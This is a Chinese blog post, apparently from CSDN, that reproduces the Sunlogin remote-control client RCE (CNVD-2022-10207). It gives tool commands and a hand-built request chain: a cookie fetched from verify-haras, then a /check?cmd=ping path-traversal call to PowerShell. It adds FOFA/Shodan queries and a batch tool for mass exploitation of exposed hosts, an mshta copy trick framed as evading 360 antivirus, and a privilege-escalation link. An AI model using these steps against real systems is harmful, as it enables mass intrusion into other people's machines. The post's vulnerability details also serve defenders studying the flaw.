CNVD-2022-10207:向日葵RCE

一:漏洞摘要

向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的情况下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的使用带来很多便捷,还能为其提供各类保障。

Sunlogin RCE 是漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行利用,客户端开启客户端会自动随机开启一个大于40000的端口号。

影响客户端版本:

  • 11.1.1
  • 10.3.0.27372
  • 11.0.0.33162

二:快速复现

操作系统:Windows 10

目标靶机IP地址:192.168.50.223

向日葵客户端版本:11.0.0.33162


    
    
  1. 向日葵漏洞版本下载:
  2. 链接:https://pan.baidu.com/s/1FuuCz3iPVhxwigTQs5T07g? pwd=dw7t
  3. 提取码:dw7t

步骤一:在Windows 10中安装向日葵程序....并关闭系统防火墙...

步骤二:使用一下工具对其进行漏洞探测与利用...


    
    
  1. ###工具项目地址
  2. https://github.com/Mr-xn/sunlogin_rce
  3. ###漏洞探测
  4. xrkRce.exe -h 192.168.50.223 -t scan
  5. ###漏洞利用
  6. xrkRce.exe -h 192.168.50.223 -t rce -p 49843 -c "whoami"

三:手工复现

基于以上环境进行测试....

步骤一:使用工具对目标进行端口扫描....使用一下命令进行访问测试发现49843端口比较可疑....

curl 192.168.50.223:48943
    
    

步骤二:浏览器访问以下地址,获取其Cookie值..


    
    
  1. ###示例
  2. ip+端口号+cgi-bin/rpc?action=verify-haras
  3. ###拼接访问
  4. http://192.168.50.223:49843/cgi-bin/rpc?action=verify-haras
  5. ###Cookie信息
  6. PEYMEjYeyKrFKyNqn18536BWNYfLDz25

步骤三:访问以下地址并使用BP抓包在其添加上Cookie信息,进行漏洞验证...


    
    
  1. ###Get URL
  2. http: // 192.168. 50.223: 49843/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..% 2Fwindows%2Fsystem32% 2FWindowsPowerShell%2Fv1. 0%2Fpowershell.exe+%20whoami
  3. ###Cookie Info
  4. Cookie:CID=PEYMEjYeyKrFKyNqn18536BWNYfLDz25

步骤四:漏洞原理....

当向日葵客户端在windows运行时,会连接远程Oray的服务器,开放对外接口,接口由sunlogin处理,且开启监听外部的连接访问端口,大概在50000左右,可通过工具测试,低版本向日葵RCE主要发生在对外开放的接口/check处,当cmd的值为ping/nslookup开头时触发。

四:批量利用

步骤一:使用shodan进行资产搜索...并到处数据到TXT文本中...


    
    
  1. fofa:body= "Verification failure" && port= "49155"
  2. shodan:http.html: "Verification failure" port:> 40000
  3. ###注意
  4. 由于shodan很少扫描收录高端口号。所以该结果并不准确。

步骤二:下载以下项目并部署好环境将以上的资产放入Target.txt中进行批量测试...

https://github.com/j2ekim/sunlogin_rce
    
    

步骤三:使用利用工具进行漏洞验证猜想....

后续利用:+360安全防护


    
    
  1. copy mshta.exe C : \ProgramData \ms.exe
  2. cmd / c C : \ProgramData \ms.exe
  3. cmd / c C : \ProgramData \ms.exe

五:提权利用

https://github.com/Ryze-T/CNVD-2022-10270-LPE
    
    

参考文章:

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值